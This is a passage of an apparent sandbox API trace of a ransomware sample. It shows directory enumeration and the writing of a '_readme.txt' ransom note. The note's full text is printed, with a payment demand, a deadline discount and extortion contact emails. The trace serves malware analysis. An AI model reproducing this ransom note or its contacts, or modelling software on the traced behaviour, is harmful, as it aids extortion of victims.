RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.657] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.657] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.657] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.657] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.657] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.657] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.657] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0209.657] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.657] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.657] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.657] PathFindFileNameW (pszPath="") returned="" [0209.657] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.658] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.658] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.658] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.658] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.658] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.658] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.658] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0209.658] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.658] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.658] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0209.659] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.660] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.660] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.660] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.660] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.660] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.660] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.660] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.661] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.661] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.661] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.661] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.661] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.661] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.661] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.661] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.661] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.661] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.661] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.661] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.661] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.663] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.663] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.664] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.664] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.665] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.665] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.666] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.666] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.666] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.666] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.666] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.666] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.666] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.666] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.666] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.666] 